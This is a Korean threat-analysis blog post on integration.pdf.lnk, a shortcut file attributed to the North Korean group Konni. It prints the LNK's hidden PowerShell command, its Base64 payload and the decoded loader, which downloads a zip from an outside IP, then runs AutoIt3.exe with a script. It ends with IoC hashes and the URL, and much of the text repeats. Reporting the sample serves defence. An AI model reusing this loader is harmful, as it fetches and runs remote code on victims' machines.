북한 해킹 단체 Konni(코니) 에서 만든 악성코드-integration.pdf.lnk(2024.8.22)
Contents
오늘도 위대하게 경애하지 않는 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 integration.pdf.lnk(2024.8.22)에 대해 알아보겠습니다. 코니 는 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체이며 당연히 북한의 정찰총국 밑에 있는 따가리 해킹 단체입니다.
악성코드 해쉬값
파일명:integration.pdf.lnk
사이즈:122 KB
MD5:ffde299028d48cb2258d274f44d56766
SHA-1:678fe2a8a01339138194a70763d69d18d2772beb
SHA-256:3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
이며 해당 악성코드 LNK 파일을 열어보면 다음과 같이 Base64로 돼 있는 것을 확인할 수가 있습니다.
StringD(a)ta
{
namestring: PDF View
relativepath: ..\..\Windows\System32\cmd(.)exe
workingdir: C:\Users\User\Desktop
commandlinearguments: /c powe(r)shell -WindowStyle Hidden -Command "
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String('JGFw(c)GR(h)dGEgP(S)BbU3lzdGVtLkVudmlyb25tZW50XTo6(R)2V0Rm9s
ZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR(1)cmw(g)PSAn(a)HR0cDovLzIuN
Tgu(N)TYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDg
xZi56(a)XAiOyBJbn(Z)va2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJH
ppcFBhdGg7IEFkZC1UeXBlIC1B(c)3Nl(b)WJseU5hb(W)UgU3lzdGVtLklPLkNvbXByZ
XNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJl(c)3Npb24(u)WmlwR(m)lsZV
06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCw(g)JGFwcGRhdGEpOyAkYXV(0)b2l0U
GF0aCA9ICIkY(X)BwZGF0(Y)VxBdXRvSXQzLmV4ZSI7ICRzY(3)JpcHRQYXRoID0gIiRhcH
Bk(Y)XRhXHNjcmlwdC5(h)M3gi(O)yBTdGFydC1Qcm(9)jZXNzIC1GaWxlUGF0aCAkYXV0b
2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3J(p)cHRQYXRoOyBSZW1vdmUtSXRlbSAtUG(F)0
aCAkemlwUGF0aA0K')) | Invoke-Expression"
iconlocation: .\Document(.)pdf
}
이걸 다시 Base64 부분을 디코딩하면 다음과 같은 결과가 됩니다.
$appdata = [System.Environment]::GetFolderPath('ApplicationData'); $url =
'hxxp://2(.)58(.)56(.)124/API481f(.)zip'; $zipPath =
"$appdata\API481f(.)zip"; Invoke-WebRequest -Uri $url -
OutFile $zipPath; Add-Type -AssemblyName System(.)IO.Comp
ression.FileSystem; [System.IO(.)Compression.ZipFile]::Ext
ractToDirectory($zipPath, $appdata); $autoitPath = "$appdat
a\AutoIt3(.)exe"; $scriptPath = "$appdata\script(.)a3x"; Star
t-Process -FilePath $autoitPath -ArgumentList $scriptPath;
Remove-Ite(m) -Path $zipPath
PDF 내용
Steps to using our system:
When you register you get a username and password. That will allow you to log in to the
website among other things.
When using the API please follow the link:
hxxps://api(.)publicleads(.)net/partners/v1/login?username={{$UserName}}&password={{$Passwor
d}}
If all …
악성코드 해쉬값
파일명:integration.pdf.lnk
사이즈:122 KB
MD5:ffde299028d48cb2258d274f44d56766
SHA-1:678fe2a8a01339138194a70763d69d18d2772beb
SHA-256:3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
이며 해당 악성코드 LNK 파일을 열어보면 다음과 같이 Base64로 돼 있는 것을 확인할 수가 있습니다.
StringD(a)ta
{
namestring: PDF View
relativepath: ..\..\Windows\System32\cmd(.)exe
workingdir: C:\Users\User\Desktop
commandlinearguments: /c powe(r)shell -WindowStyle Hidden -Command "
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String('JGFw(c)GR(h)dGEgP(S)BbU3lzdGVtLkVudmlyb25tZW50XTo6(R)2V0Rm9s
ZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR(1)cmw(g)PSAn(a)HR0cDovLzIuN
Tgu(N)TYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDg
xZi56(a)XAiOyBJbn(Z)va2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJH
ppcFBhdGg7IEFkZC1UeXBlIC1B(c)3Nl(b)WJseU5hb(W)UgU3lzdGVtLklPLkNvbXByZ
XNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJl(c)3Npb24(u)WmlwR(m)lsZV
06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCw(g)JGFwcGRhdGEpOyAkYXV(0)b2l0U
GF0aCA9ICIkY(X)BwZGF0(Y)VxBdXRvSXQzLmV4ZSI7ICRzY(3)JpcHRQYXRoID0gIiRhcH
Bk(Y)XRhXHNjcmlwdC5(h)M3gi(O)yBTdGFydC1Qcm(9)jZXNzIC1GaWxlUGF0aCAkYXV0b
2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3J(p)cHRQYXRoOyBSZW1vdmUtSXRlbSAtUG(F)0
aCAkemlwUGF0aA0K')) | Invoke-Expression"
iconlocation: .\Document(.)pdf
}
이걸 다시 Base64 부분을 디코딩하면 다음과 같은 결과가 됩니다.
$appdata = [System.Environment]::GetFolderPath('ApplicationData'); $url =
'hxxp://2(.)58(.)56(.)124/API481f(.)zip'; $zipPath =
"$appdata\API481f(.)zip"; Invoke-WebRequest -Uri $url -
OutFile $zipPath; Add-Type -AssemblyName System(.)IO.Comp
ression.FileSystem; [System.IO(.)Compression.ZipFile]::Ext
ractToDirectory($zipPath, $appdata); $autoitPath = "$appdat
a\AutoIt3(.)exe"; $scriptPath = "$appdata\script(.)a3x"; Star
t-Process -FilePath $autoitPath -ArgumentList $scriptPath;
Remove-Ite(m) -Path $zipPath
PDF 내용
Steps to using our system:
When you register you get a username and password. That will allow you to log in to the
website among other things.
When using the API please follow the link:
hxxps://api(.)publicleads(.)net/partners/v1/login?username={{$UserName}}&password={{$Passwor
d}}
If all …
IoC
2.58.56.124
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
678fe2a8a01339138194a70763d69d18d2772beb
ffde299028d48cb2258d274f44d56766
http://2.58.56.124/API481f.zip
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
678fe2a8a01339138194a70763d69d18d2772beb
ffde299028d48cb2258d274f44d56766
http://2.58.56.124/API481f.zip